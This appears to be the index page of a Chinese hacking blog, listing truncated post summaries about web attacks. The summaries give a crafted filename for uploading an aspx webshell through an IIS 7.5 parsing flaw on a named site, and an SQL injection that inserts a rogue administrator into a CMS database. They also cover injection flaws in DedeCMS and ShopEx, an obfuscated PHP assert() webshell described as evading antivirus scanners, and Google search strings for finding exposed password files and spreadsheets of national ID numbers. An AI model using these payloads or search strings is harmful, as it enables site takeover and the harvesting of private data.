heikeboy’s Blog

摘要： IIS7.5解析漏洞http://www.cnk0n9.com/fckeditor/editor/fckeditor.html,上传图片，浏览，上传一个aspx的一句话木马，名字为：a.aspx.a;.a.aspx.jpg..jpg上传后直接得到上传地址 阅读全文

摘要： EXP: 直接访问UserCenter/login.aspx用户名处输入： 123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into 阅读全文

摘要： 常用的google关键字：foo1 foo2 (也就是关联，比如搜索xx公司 xx美女)operatorfoofiletype123 类型sitefoo.com 相对直接看网站更有意思，可以得到许多意外的信息intextfoointitle fooltitle 标题哦allinurlfoo 搜索xx网站的所有相关连接。（踩点必备）linksfoo 不要说就知道是它的相关链接allintiltefoo.com我们可以辅助- +来调整搜索的精确程度直接搜索密码：(引号表示为精确搜索)当然我们可以再延伸到上面的结果里进行二次搜索index of htpasswd passwdfiletypexls 阅读全文

摘要： 此漏洞无视gpc转义，过80sec注入防御。补充下，不用担心后台找不到。这只是一个demo，都能修改任意数据库了，还怕拿不到SHELL？起因是全局变量$GLOBALS可以被任意修改，随便看了下，漏洞一堆，我只找了一处。include/dedesql.class.phpif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) {... 阅读全文

摘要： shopex代码核心的地方都做了加密处理，找漏洞就需要一点想象空间了，比如这个SQL注入…存在于用户注册(想不到的位置吧？)/core/shop/controller/ctl.passport.php 267行if( !$info = $account->create($_POST,$message) ) {…2.看到1，想到有没有可能$account->create是foreach $_POST构造sql语句的呐？3.看数据表结构：果断提交时$_POST里加入member_id测试(其实测试时我还试了mobile等，嘿，只捡有用的字段说)，然后就有了下图：修复方案插入时去掉mem 阅读全文

摘要： 只测试了360网马查杀和安全狗网马查杀，均未被发现range(1,200)----新建一个1到200的数组。range(a,z)就是一个a到z的数组；大小写有区别chr()----转换ASCIIchr($a[51])--------是密码4，实际是chr(52)。也可以把[chr($a[51])]改为['4']$a[51]就是数组的$a的第51个数的值（52）。因为数组的值是从0开始数的，所以第51位为52.原一句话:assert()----跟eval()意思差不多都用来执行语句的重点是{}，变量分离;这样{}中的就是字符串，也就可以把_POST转码eg:<?php$f4 阅读全文

摘要： ext:php program_listing intitle:MythWeb.Program.Listinginurl:preferences.ini “[emule]”intitle:”Index of /CFIDE/” administrator“access denied for user” “using password”ext:php intext:”Powered by phpNewMan Version” 可以看到：path/to/news/browse.php?clang=../../../../../../file/i/wantinurl:”/becommunity/com 阅读全文

摘要： filetype:xls "姓名" "性别" "身份证号码"得出结果 阅读全文

摘要： 关键字："index of"/upload site:jp 阅读全文